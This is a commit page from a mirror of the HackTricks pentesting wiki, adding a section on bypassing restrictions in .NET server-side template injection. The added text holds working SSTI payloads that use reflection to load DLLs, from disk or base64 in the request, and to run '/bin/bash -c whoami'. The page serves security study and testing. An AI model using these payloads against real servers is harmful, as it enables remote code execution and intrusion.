maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1013 from CyberzSentry/master

Browse Source 
Using reflection mechanisms in SSTI
This commit is contained in:
SirBroccoli 2025-03-21 10:24:46 +01:00 committed by GitHub
commit e14bb1b55a
1 changed files with 19 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
src/pentesting-web/ssti-server-side-template-injection/README.md
View File

@ -1024,6 +1024,25 @@ The .NET `System.Diagnostics.Process.Start` method can be used to start any proc
- [https://www.w3schools.com/asp/asp_examples.asp](https://www.w3schools.com/asp/asp_examples.asp)
### .Net Bypassing restrictions
The .NET Reflection mechanisms can be used to bypass blacklisting or classes not being present in the assembly. DLL's can be loaded at runtime with methods and properties accessible from basic objects.
Dll's can be loaded with:
- `{"a".GetType().Assembly.GetType("System.Reflection.Assembly").GetMethod("LoadFile").Invoke(null, "/path/to/System.Diagnostics.Process.dll".Split("?"))}` - from filesystem.
- `{"a".GetType().Assembly.GetType("System.Reflection.Assembly").GetMethod("Load", [typeof(byte[])]).Invoke(null, [Convert.FromBase64String("Base64EncodedDll")])}` - directly from request.
Full command execution:
```
{"a".GetType().Assembly.GetType("System.Reflection.Assembly").GetMethod("LoadFile").Invoke(null, "/path/to/System.Diagnostics.Process.dll".Split("?")).GetType("System.Diagnostics.Process").GetMethods().GetValue(0).Invoke(null, "/bin/bash,-c ""whoami""".Split(","))}
```
**More Information**
- [https://efigo.pl/en/blog/cve-2024-9150/](https://efigo.pl/en/blog/cve-2024-9150/)
### Mojolicious (Perl)
Even if it's perl it uses tags like ERB in Ruby.